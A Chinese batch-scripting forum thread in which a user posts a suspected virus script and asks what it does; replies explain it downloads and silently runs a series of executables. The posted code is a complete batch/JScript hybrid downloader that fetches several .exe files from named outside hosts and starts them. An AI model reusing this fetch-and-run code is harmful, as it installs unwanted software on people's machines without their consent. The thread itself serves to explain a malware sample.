找回密码
 注册
搜索
[新手上路]批处理新手入门导读[视频教程]批处理基础视频教程[视频教程]VBS基础视频教程[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动[批处理精品]CMD命令50条不能说的秘密[在线下载]第三方命令行工具[在线帮助]VBScript / JScript 在线参考
查看: 23068|回复: 4

[其他] 谁能解释一下这个病毒批处理代码的意思

[复制链接]
发表于 2015-8-16 18:27:32 | 显示全部楼层 |阅读模式
本帖最后由 注册个几8 于 2015-8-16 18:44 编辑

代码如下:
  1. echo=1/*>nul
  2. @cls
  3. @echo off
  4. call :http "http://down.ssddl.com/xzrpdf_70247.exe" "c:\xzrpdf_70247.exe"
  5. call :http "http://down.ssddl.com/zupmopn_30394.exe" "c:\zupmopn_30394.exe"
  6. start c:\xzrpdf_70247.exe
  7. start c:\zupmopn_30394.exe
  8. call :http "http://down.ssddl.com/jKINSTALLERS_60_201153.exe" "c:\jKINSTALLERS_60_201153.exe"
  9. call :http "http://down.ssddl.com/t10021.exe" "c:\t10021.exe"
  10. call :http "http://down.ssddl.com/setupX071_32.exe" "c:\setupX071_32.exe"
  11. call :http "http://down.yinyue.fm/open/setup_3102-22942.exe" "c:\setup_3102-22942.exe"
  12. call :http "http://down.ssddl.com/setupX_2002_221.exe" "c:\setupX_2002_221.exe"
  13. start c:\jKINSTALLERS_60_201153.exe
  14. start c:\t10021.exe
  15. start c:\setupX071_32.exe
  16. start c:\setup_3102-22942.exe
  17. start c:\setupX_2002_221.exe
  18. goto :eof
  19. :http
  20. cscript -nologo -e:jscript "%~f0" "%~1" "%~2"
  21. goto :eof
  22. */
  23. var iLocal,iRemote,xPost,sGet;
  24. iLocal =WScript.Arguments(1);
  25. iRemote = WScript.Arguments(0);
  26. iLocal=iLocal.toLowerCase();
  27. xPost = new ActiveXObject("MSXML2.XMLHTTP.3.0");
  28. xPost.Open("GET",iRemote,0);
  29. xPost.Send();
  30. sGet = new ActiveXObject("ADODB.Stream");
  31. sGet.Mode = 3;
  32. sGet.Type = 1;
  33. sGet.Open();
  34. sGet.Write(xPost.responseBody);
  35. sGet.SaveToFile(iLocal,2);
  36. sGet.Close();
复制代码
发表于 2015-8-16 19:14:38 | 显示全部楼层
应该是在指定的网站上下载一系列安装包进行安装,貌似是静默安装
发表于 2015-8-16 19:18:41 | 显示全部楼层
我靠,还有这么高档的病毒
发表于 2015-8-16 19:22:10 | 显示全部楼层
就是下一堆exe来安装咯
让人惊讶的是不光结构很好,而且居然还用了混编...
发表于 2015-8-17 09:55:09 | 显示全部楼层
玩病毒的也讲经济效益哈
科技是第一生产力啊
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|批处理之家 ( 渝ICP备10000708号 )

GMT+8, 2026-3-18 17:07 , Processed in 0.018496 second(s), 8 queries , File On.

Powered by Discuz! X3.5

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表